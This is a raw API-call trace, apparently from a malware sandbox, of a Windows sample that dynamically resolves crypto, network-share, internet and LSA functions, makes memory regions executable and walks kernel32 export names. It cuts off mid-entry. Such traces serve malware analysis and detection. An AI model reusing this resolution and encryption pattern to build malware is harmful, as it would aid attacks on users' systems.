[0025.325] GetProcAddress (hModule=0x76c20000, lpProcName="DeviceIoControl") returned 0x76c3322f [0025.325] GetProcAddress (hModule=0x76c20000, lpProcName="OpenMutexW") returned 0x76c35151 [0025.325] GetProcAddress (hModule=0x76c20000, lpProcName="CreateMutexW") returned 0x76c3424c [0025.325] GetProcAddress (hModule=0x76c20000, lpProcName="lstrlenA") returned 0x76c35a4b [0025.325] GetProcAddress (hModule=0x76c20000, lpProcName="ExitProcess") returned 0x76c37a10 [0025.325] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleHandleA") returned 0x76c31245 [0025.325] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualAlloc") returned 0x76c31856 [0025.325] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0025.325] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcpyA") returned 0x76c52a9d [0025.326] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcatA") returned 0x76c52b7a [0025.326] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0025.326] GetProcAddress (hModule=0x76c20000, lpProcName="lstrlenW") returned 0x76c31700 [0025.326] GetProcAddress (hModule=0x76c20000, lpProcName="CreateDirectoryW") returned 0x76c34259 [0025.326] GetProcAddress (hModule=0x76c20000, lpProcName="GetLastError") returned 0x76c311c0 [0025.326] GetProcAddress (hModule=0x76c20000, lpProcName="OutputDebugStringW") returned 0x76c5d1d4 [0025.326] GetProcAddress (hModule=0x76c20000, lpProcName="TlsGetValue") returned 0x76c311e0 [0025.326] GetProcAddress (hModule=0x76c20000, lpProcName="CreateFileW") returned 0x76c33f5c [0025.326] GetProcAddress (hModule=0x76c20000, lpProcName="HeapAlloc") returned 0x7715e026 [0025.326] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcpynW") returned 0x76c5d556 [0025.326] GetProcAddress (hModule=0x76c20000, lpProcName="GetFileSize") returned 0x76c3196e [0025.326] GetProcAddress (hModule=0x76c20000, lpProcName="FindNextFileW") returned 0x76c354ee [0025.326] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcmpW") returned 0x76c35929 [0025.326] GetProcAddress (hModule=0x76c20000, lpProcName="FindClose") returned 0x76c34442 [0025.327] GetProcAddress (hModule=0x76c20000, lpProcName="GetTickCount") returned 0x76c3110c [0025.327] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualFree") returned 0x76c3186e [0025.327] GetProcAddress (hModule=0x76c20000, lpProcName="ExitThread") returned 0x7718d598 [0025.327] GetProcAddress (hModule=0x76c20000, lpProcName="CreateThread") returned 0x76c334d5 [0025.327] GetProcAddress (hModule=0x76c20000, lpProcName="WaitForSingleObject") returned 0x76c31136 [0025.327] GetProcAddress (hModule=0x76c20000, lpProcName="TlsSetValue") returned 0x76c314fb [0025.327] GetProcAddress (hModule=0x76c20000, lpProcName="CreateToolhelp32Snapshot") returned 0x76c5735f [0025.327] GetProcAddress (hModule=0x76c20000, lpProcName="CreateFileA") returned 0x76c353c6 [0025.327] GetProcAddress (hModule=0x76c20000, lpProcName="Process32NextW") returned 0x76c5896c [0025.327] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleHandleW") returned 0x76c334b0 [0025.327] GetProcAddress (hModule=0x76c20000, lpProcName="GetSystemDirectoryW") returned 0x76c35063 [0025.327] GetProcAddress (hModule=0x76c20000, lpProcName="CreateProcessW") returned 0x76c3103d [0025.327] GetProcAddress (hModule=0x76c20000, lpProcName="GetShortPathNameW") returned 0x76c3d2f9 [0025.327] GetProcAddress (hModule=0x76c20000, lpProcName="ExpandEnvironmentStringsW") returned 0x76c34173 [0025.328] GetProcAddress (hModule=0x76c20000, lpProcName="Sleep") returned 0x76c310ff [0025.328] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcessId") returned 0x76c311f8 [0025.328] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualQuery") returned 0x76c3445a [0025.328] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0025.328] GetProcAddress (hModule=0x76c20000, lpProcName="IsBadReadPtr") returned 0x76c5d075 [0025.328] GetProcAddress (hModule=0x76c20000, lpProcName="FreeLibrary") returned 0x76c334c8 [0025.328] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcmpA") returned 0x76c4eceb [0025.328] GetProcAddress (hModule=0x76c20000, lpProcName="UnmapViewOfFile") returned 0x76c31826 [0025.328] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcmpiW") returned 0x76c4d5cd [0025.328] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcpyW") returned 0x76c53102 [0025.328] GetProcAddress (hModule=0x76c20000, lpProcName="MoveFileExW") returned 0x76c49b2d [0025.328] GetProcAddress (hModule=0x76c20000, lpProcName="FindFirstFileW") returned 0x76c34435 [0025.328] GetProcAddress (hModule=0x76c20000, lpProcName="WaitForMultipleObjects") returned 0x76c34220 [0025.328] GetProcAddress (hModule=0x76c20000, lpProcName="GetDriveTypeW") returned 0x76c3418b [0025.328] GetProcAddress (hModule=0x76c20000, lpProcName="GetTickCount64") returned 0x76c4eee0 [0025.329] GetProcAddress (hModule=0x76c20000, lpProcName="SetThreadExecutionState") returned 0x76c4f747 [0025.329] GetProcAddress (hModule=0x76c20000, lpProcName="GetFileSizeEx") returned 0x76c359e2 [0025.329] GetProcAddress (hModule=0x76c20000, lpProcName="IsProcessorFeaturePresent") returned 0x76c35235 [0025.329] GetProcAddress (hModule=0x76c20000, lpProcName="CreateFileMappingW") returned 0x76c31909 [0025.329] GetProcAddress (hModule=0x76c20000, lpProcName="MapViewOfFile") returned 0x76c318f1 [0025.329] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcess") returned 0x76c31809 [0025.329] GetProcAddress (hModule=0x76c20000, lpProcName="LocalFree") returned 0x76c32d3c [0025.329] GetProcAddress (hModule=0x76c20000, lpProcName="GetUserDefaultUILanguage") returned 0x76c344ab [0025.329] GetProcAddress (hModule=0x76c20000, lpProcName="InitializeCriticalSection") returned 0x77162c42 [0025.329] GetProcAddress (hModule=0x76c20000, lpProcName="DeleteCriticalSection") returned 0x771645f5 [0025.329] GetProcAddress (hModule=0x76c20000, lpProcName="SetLastError") returned 0x76c311a9 [0025.329] GetProcAddress (hModule=0x76c20000, lpProcName="EnterCriticalSection") returned 0x771522b0 [0025.329] GetProcAddress (hModule=0x76c20000, lpProcName="LeaveCriticalSection") returned 0x77152270 [0025.329] GetProcAddress (hModule=0x76c20000, lpProcName="TerminateThread") returned 0x76c37a2f [0025.330] GetProcAddress (hModule=0x76c20000, lpProcName="GlobalAlloc") returned 0x76c3588e [0025.330] GetProcAddress (hModule=0x76c20000, lpProcName="GlobalFree") returned 0x76c35558 [0025.330] GetProcAddress (hModule=0x76c20000, lpProcName="Beep") returned 0x76ca52e8 [0025.330] GetProcAddress (hModule=0x76c20000, lpProcName="GetWindowsDirectoryA") returned 0x76c52b0a [0025.330] GetProcAddress (hModule=0x76c20000, lpProcName="MoveFileExA") returned 0x76c5ccc1 [0025.330] GetProcAddress (hModule=0x76c20000, lpProcName="GetVersionExA") returned 0x76c33519 [0025.330] GetProcAddress (hModule=0x76c20000, lpProcName="Process32FirstW") returned 0x76c58baf [0025.330] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcatW") returned 0x76c5828e [0025.330] GetProcAddress (hModule=0x76c20000, lpProcName="SetFilePointerEx") returned 0x76c4c807 [0025.330] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74d40000 [0025.330] VirtualQuery (in: lpAddress=0xe0000, lpBuffer=0x81f8c4, dwLength=0x1c | out: lpBuffer=0x81f8c4*(BaseAddress=0xe0000, AllocationBase=0xe0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0025.330] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xf0000 [0025.330] VirtualFree (lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0025.331] GetProcAddress (hModule=0x74d40000, lpProcName="LsaAddAccountRights") returned 0x74d88819 [0025.331] GetProcAddress (hModule=0x74d40000, lpProcName="LsaFreeMemory") returned 0x74d5ede1 [0025.331] GetProcAddress (hModule=0x74d40000, lpProcName="LsaClose") returned 0x74d61af7 [0025.331] GetProcAddress (hModule=0x74d40000, lpProcName="EncryptionDisable") returned 0x74d82b27 [0025.331] GetProcAddress (hModule=0x74d40000, lpProcName="InitializeSecurityDescriptor") returned 0x74d54620 [0025.331] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDecrypt") returned 0x74d83178 [0025.331] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0025.331] GetProcAddress (hModule=0x74d40000, lpProcName="CryptImportKey") returned 0x74d4c532 [0025.331] GetProcAddress (hModule=0x74d40000, lpProcName="GetSidSubAuthority") returned 0x74d50e24 [0025.331] GetProcAddress (hModule=0x74d40000, lpProcName="GetSidSubAuthorityCount") returned 0x74d50e0c [0025.332] GetProcAddress (hModule=0x74d40000, lpProcName="EqualDomainSid") returned 0x74d832d8 [0025.332] GetProcAddress (hModule=0x74d40000, lpProcName="CryptReleaseContext") returned 0x74d4e124 [0025.332] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyKey") returned 0x74d4c51a [0025.332] GetProcAddress (hModule=0x74d40000, lpProcName="AreAllAccessesGranted") returned 0x74d830a8 [0025.332] GetProcAddress (hModule=0x74d40000, lpProcName="CryptGenRandom") returned 0x74d4dfc8 [0025.332] GetProcAddress (hModule=0x74d40000, lpProcName="CryptExportKey") returned 0x74d491ea [0025.332] GetProcAddress (hModule=0x74d40000, lpProcName="CryptGenKey") returned 0x74d48ee9 [0025.332] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextW") returned 0x74d4df14 [0025.332] GetProcAddress (hModule=0x74d40000, lpProcName="LookupAccountSidW") returned 0x74d54874 [0025.332] GetProcAddress (hModule=0x74d40000, lpProcName="LsaQueryTrustedDomainInfo") returned 0x74d88949 [0025.332] GetProcAddress (hModule=0x74d40000, lpProcName="LsaCreateTrustedDomainEx") returned 0x74d894c1 [0025.332] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75fd0000 [0027.437] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x81f8c4, dwLength=0x1c | out: lpBuffer=0x81f8c4*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0027.437] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0xe0000 [0027.438] VirtualFree (lpAddress=0xf0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0027.438] GetProcAddress (hModule=0x75fd0000, lpProcName="ShellExecuteExW") returned 0x75ff1e46 [0027.438] GetProcAddress (hModule=0x75fd0000, lpProcName="SHGetFolderPathW") returned 0x76055708 [0027.438] LoadLibraryA (lpLibFileName="Secur32.dll") returned 0x74b60000 [0027.516] VirtualQuery (in: lpAddress=0xe0000, lpBuffer=0x81f8c4, dwLength=0x1c | out: lpBuffer=0x81f8c4*(BaseAddress=0xe0000, AllocationBase=0xe0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0027.517] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf0000 [0027.517] VirtualFree (lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0027.517] GetProcAddress (hModule=0x74b60000, lpProcName="LsaConnectUntrusted") returned 0x74ca28c3 [0027.517] LoadLibraryA (lpLibFileName="NETAPI32.dll") returned 0x74b40000 [0027.861] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x81f8c4, dwLength=0x1c | out: lpBuffer=0x81f8c4*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0027.861] VirtualAlloc (lpAddress=0x0, dwSize=0x1c, flAllocationType=0x3000, flProtect=0x4) returned 0xe0000 [0027.861] VirtualFree (lpAddress=0xf0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0027.861] GetProcAddress (hModule=0x74b40000, lpProcName="DsRoleGetPrimaryDomainInformation") returned 0x74af1f3d [0027.944] GetProcAddress (hModule=0x74b40000, lpProcName="DsRoleFreeMemory") returned 0x74af19a9 [0027.944] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x75340000 [0027.944] VirtualQuery (in: lpAddress=0xe0000, lpBuffer=0x81f8c4, dwLength=0x1c | out: lpBuffer=0x81f8c4*(BaseAddress=0xe0000, AllocationBase=0xe0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0027.944] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0xf0000 [0027.944] VirtualFree (lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0027.944] GetProcAddress (hModule=0x75340000, lpProcName="StrToIntA") returned 0x7536cd65 [0027.945] GetProcAddress (hModule=0x75340000, lpProcName="StrStrW") returned 0x7534e52d [0027.945] LoadLibraryA (lpLibFileName="MPR.dll") returned 0x74ad0000 [0028.112] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x81f8c4, dwLength=0x1c | out: lpBuffer=0x81f8c4*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0028.112] VirtualAlloc (lpAddress=0x0, dwSize=0x24, flAllocationType=0x3000, flProtect=0x4) returned 0xe0000 [0028.112] VirtualFree (lpAddress=0xf0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0028.112] GetProcAddress (hModule=0x74ad0000, lpProcName="WNetOpenEnumW") returned 0x74ad2f06 [0028.112] GetProcAddress (hModule=0x74ad0000, lpProcName="WNetEnumResourceW") returned 0x74ad3058 [0028.112] GetProcAddress (hModule=0x74ad0000, lpProcName="WNetCloseEnum") returned 0x74ad2dd6 [0028.112] GetProcAddress (hModule=0x74ad0000, lpProcName="WNetAddConnection2W") returned 0x74ad4744 [0028.112] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75bc0000 [0028.313] VirtualQuery (in: lpAddress=0xe0000, lpBuffer=0x81f8c4, dwLength=0x1c | out: lpBuffer=0x81f8c4*(BaseAddress=0xe0000, AllocationBase=0xe0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0028.313] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf0000 [0028.313] VirtualFree (lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0028.313] GetProcAddress (hModule=0x75bc0000, lpProcName=0x16) returned 0x75bc449d [0028.313] GetProcAddress (hModule=0x75bc0000, lpProcName=0x3) returned 0x75bc3918 [0028.313] GetProcAddress (hModule=0x75bc0000, lpProcName=0x4) returned 0x75bc6bdd [0028.313] GetProcAddress (hModule=0x75bc0000, lpProcName=0x9) returned 0x75bc2d8b [0028.313] GetProcAddress (hModule=0x75bc0000, lpProcName=0xb) returned 0x75bc311b [0028.313] GetProcAddress (hModule=0x75bc0000, lpProcName=0x6f) returned 0x75bc37ad [0028.314] GetProcAddress (hModule=0x75bc0000, lpProcName=0x74) returned 0x75bc3c5f [0028.314] GetProcAddress (hModule=0x75bc0000, lpProcName=0x17) returned 0x75bc3eb8 [0028.314] GetProcAddress (hModule=0x75bc0000, lpProcName=0x73) returned 0x75bc3ab2 [0028.314] GetProcAddress (hModule=0x75bc0000, lpProcName="inet_pton") returned 0x75bd3969 [0028.314] GetProcAddress (hModule=0x75bc0000, lpProcName=0x13) returned 0x75bc6f01 [0028.314] GetProcAddress (hModule=0x75bc0000, lpProcName=0x10) returned 0x75bc6b0e [0028.314] GetProcAddress (hModule=0x75bc0000, lpProcName=0xc) returned 0x75bcb131 [0028.314] GetProcAddress (hModule=0x75bc0000, lpProcName=0x34) returned 0x75bd7673 [0028.314] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x753d0000 [0030.491] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x81f8c4, dwLength=0x1c | out: lpBuffer=0x81f8c4*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0030.491] VirtualAlloc (lpAddress=0x0, dwSize=0x2c, flAllocationType=0x3000, flProtect=0x4) returned 0xe0000 [0030.492] VirtualFree (lpAddress=0xf0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0030.498] GetProcAddress (hModule=0x753d0000, lpProcName="InternetReadFile") returned 0x753eb406 [0030.498] GetProcAddress (hModule=0x753d0000, lpProcName="InternetCloseHandle") returned 0x753eab49 [0030.498] GetProcAddress (hModule=0x753d0000, lpProcName="HttpQueryInfoA") returned 0x753ea33e [0030.498] GetProcAddress (hModule=0x753d0000, lpProcName="HttpSendRequestA") returned 0x754618f8 [0030.498] GetProcAddress (hModule=0x753d0000, lpProcName="HttpOpenRequestA") returned 0x753f4c7d [0030.498] GetProcAddress (hModule=0x753d0000, lpProcName="InternetConnectA") returned 0x753f49e9 [0030.499] GetProcAddress (hModule=0x753d0000, lpProcName="InternetCrackUrlA") returned 0x753dd075 [0030.499] GetProcAddress (hModule=0x753d0000, lpProcName="InternetOpenA") returned 0x753ff18e [0030.499] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x759b0000 [0030.499] VirtualQuery (in: lpAddress=0xe0000, lpBuffer=0x81f8c4, dwLength=0x1c | out: lpBuffer=0x81f8c4*(BaseAddress=0xe0000, AllocationBase=0xe0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0030.499] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0xf0000 [0030.499] VirtualFree (lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0030.499] GetProcAddress (hModule=0x759b0000, lpProcName="CryptBinaryToStringW") returned 0x759ea546 [0030.499] GetProcAddress (hModule=0x759b0000, lpProcName="CryptStringToBinaryA") returned 0x759e5d77 [0030.499] GetProcAddress (hModule=0x759b0000, lpProcName="CryptBinaryToStringA") returned 0x759ea8c5 [0030.499] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x755e0000 [0030.500] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x81f8c4, dwLength=0x1c | out: lpBuffer=0x81f8c4*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0030.500] VirtualAlloc (lpAddress=0x0, dwSize=0x34, flAllocationType=0x3000, flProtect=0x4) returned 0xe0000 [0030.500] VirtualFree (lpAddress=0xf0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0030.500] GetProcAddress (hModule=0x755e0000, lpProcName="CoInitializeEx") returned 0x756209ad [0030.500] GetProcAddress (hModule=0x755e0000, lpProcName="CoUninitialize") returned 0x756286d3 [0030.500] GetProcAddress (hModule=0x755e0000, lpProcName="CoCreateInstance") returned 0x75629d0b [0030.500] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x75220000 [0030.500] VirtualQuery (in: lpAddress=0xe0000, lpBuffer=0x81f8c4, dwLength=0x1c | out: lpBuffer=0x81f8c4*(BaseAddress=0xe0000, AllocationBase=0xe0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0030.500] VirtualAlloc (lpAddress=0x0, dwSize=0x38, flAllocationType=0x3000, flProtect=0x4) returned 0xf0000 [0030.501] VirtualFree (lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0030.501] GetProcAddress (hModule=0x75220000, lpProcName=0x9) returned 0x75223eae [0030.501] GetProcAddress (hModule=0x75220000, lpProcName=0x8) returned 0x75223ed5 [0030.501] VirtualProtect (in: lpAddress=0x71000, dwSize=0x36a00, flNewProtect=0x40, lpflOldProtect=0x81f950 | out: lpflOldProtect=0x81f950*=0x4) returned 1 [0030.507] VirtualProtect (in: lpAddress=0xa8000, dwSize=0xfe00, flNewProtect=0x40, lpflOldProtect=0x81f950 | out: lpflOldProtect=0x81f950*=0x4) returned 1 [0030.510] VirtualProtect (in: lpAddress=0xb8000, dwSize=0x10400, flNewProtect=0x40, lpflOldProtect=0x81f950 | out: lpflOldProtect=0x81f950*=0x4) returned 1 [0030.514] VirtualProtect (in: lpAddress=0x70000, dwSize=0x5c000, flNewProtect=0x40, lpflOldProtect=0x81f994 | out: lpflOldProtect=0x81f994*=0x4) returned 1 [0030.539] lstrlenA (lpString="kernel32.dll") returned 12 [0030.539] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0030.539] lstrcpyA (in: lpString1=0x81ecc8, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0030.539] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0030.539] lstrcpyA (in: lpString1=0x81ecc8, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0030.539] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0030.539] lstrcpyA (in: lpString1=0x81ecc8, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0030.539] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0030.539] lstrcpyA (in: lpString1=0x81ecc8, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0030.539] lstrlenA (lpString="ADDATOMA") returned 8 [0030.539] lstrcpyA (in: lpString1=0x81ecc8, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0030.539] lstrlenA (lpString="ADDATOMW") returned 8 [0030.539] lstrcpyA (in: lpString1=0x81ecc8, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0030.540] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0030.540] lstrcpyA (in: lpString1=0x81ecc8, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0030.540] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0030.540] lstrcpyA (in: lpString1=0x81ecc8, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0030.540] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0030.540] lstrcpyA (in: lpString1=0x81ecc8, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0030.540] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0030.540] lstrcpyA (in: lpString1=0x81ecc8, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0030.540] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0030.540] lstrcpyA (in: lpString1=0x81ecc8, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0030.540] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0030.540] lstrcpyA (in: lpString1=0x81ecc8, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0030.540] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0030.540] lstrcpyA (in: lpString1=0x81ecc8, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0030.540] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0030.540] lstrcpyA (in: lpString1=0x81ecc8, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0030.540] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0030.540] lstrcpyA (in: lpString1=0x81ecc8, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0030.540] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0030.540] lstrcpyA (in: lpString1=0x81ecc8, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0030.540] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0030.540] lstrcpyA (in: lpString1=0x81ecc8, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0030.540] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0030.540] lstrcpyA (in: lpString1=0x81ecc8, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0030.540] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0030.540] lstrcpyA (in: lpString1=0x81ecc8, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0030.540] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0030.540] lstrcpyA (in: lpString1=0x81ecc8, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0030.540] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0030.540] lstrcpyA (in: lpString1=0x81ecc8, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0030.540] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0030.540] lstrcpyA (in: lpString1=0x81ecc8, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0030.541] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0030.541] lstrcpyA (in: lpString1=0x81ecc8, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0030.541] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0030.541] lstrcpyA (in: lpString1=0x81ecc8, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0030.541] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0030.541] lstrcpyA (in: lpString1=0x81ecc8, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0030.541] lstrlenA (lpString="BACKUPREAD") returned 10 [0030.541] lstrcpyA (in: lpString1=0x81ecc8, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0030.541] lstrlenA (lpString="BACKUPSEEK") returned 10 [0030.541] lstrcpyA (in: lpString1=0x81ecc8, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0030.541] lstrlenA (lpString="BACKUPWRITE") returned 11 [0030.541] lstrcpyA (in: lpString1=0x81ecc8, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0030.541] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0030.541] lstrcpyA (in: lpString1=0x81ecc8, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0030.541] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0030.541] lstrcpyA (in: lpString1=0x81ecc8, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0030.541] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0030.541] lstrcpyA (in: lpString1=0x81ecc8, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0030.541] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0030.541] lstrcpyA (in: lpString1=0x81ecc8, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0030.541] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0030.541] lstrcpyA (in: lpString1=0x81ecc8, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0030.541] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0030.541] lstrcpyA (in: lpString1=0x81ecc8, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0030.541] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0030.542] lstrcpyA (in: lpString1=0x81ecc8, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") 